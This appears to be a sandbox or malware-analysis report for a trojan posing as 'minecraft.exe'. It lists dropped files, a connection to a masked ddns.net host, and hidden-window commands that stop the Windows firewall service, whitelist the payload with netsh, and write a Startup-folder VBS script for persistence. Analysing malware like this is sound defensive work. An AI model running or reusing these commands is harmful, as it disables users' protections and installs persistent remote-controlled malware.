Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\x.vbs
- '%WINDIR%\syswow64\net.exe' stop MpsSvc
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%TEMP%\minecraft.exe" "minecraft.exe" ENABLE
- minecraft.exe
- %WINDIR%\syswow64\cmd.exe
- %TEMP%\rarsfx0\run.vbs
- %TEMP%\rarsfx0\file1.txt
- %TEMP%\rarsfx0\minecraft.exe
- %TEMP%\rarsfx1\teste.bat
- %TEMP%\rarsfx1\minecraft.sfx.exe
- %TEMP%\rarsfx2\minecraft.exe
- %TEMP%\minecraft.exe
- %TEMP%\rarsfx1\minecraft.sfx.exe
- from %TEMP%\rarsfx2\minecraft.exe to %TEMP%\rarsfx2\minecraft.exex
- from %TEMP%\minecraft.exe to %TEMP%\minecraft.exex
- %TEMP%\rarsfx2\minecraft.exe
- %TEMP%\minecraft.exe
- 'lo####024.ddns.net':1400
- DNS ASK lo####024.ddns.net
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\RarSFX0\run.vbs"
- '%TEMP%\rarsfx0\minecraft.exe'
- '%TEMP%\rarsfx1\minecraft.sfx.exe' -plol -d%APPDATA%
- '%TEMP%\rarsfx2\minecraft.exe'
- '%TEMP%\minecraft.exe'
- '%WINDIR%\syswow64\cmd.exe' /c echo on error resume next:CreateObject("WScript.Shell").Run "%TEMP%\RarSFX2\minecraft.exe",1: >"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' net stop MpsSvc' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c echo on error resume next:CreateObject("WScript.Shell").Run "%TEMP%\minecraft.exe",1: >"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"' (with hidden window)
- '%WINDIR%\syswow64\netsh.exe' firewall add allowedprogram "%TEMP%\minecraft.exe" "minecraft.exe" ENABLE' (with hidden window)
- '%WINDIR%\syswow64\notepad.exe' %TEMP%\RarSFX0\file1.txt
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\RarSFX1\teste.bat" "
- '%WINDIR%\syswow64\cmd.exe' /c echo on error resume next:CreateObject("WScript.Shell").Run "%TEMP%\RarSFX2\minecraft.exe",1: >"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
- '%WINDIR%\syswow64\cmd.exe' net stop MpsSvc
- '%WINDIR%\syswow64\net1.exe' stop MpsSvc
- '%WINDIR%\syswow64\cmd.exe' /c echo on error resume next:CreateObject("WScript.Shell").Run "%TEMP%\minecraft.exe",1: >"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"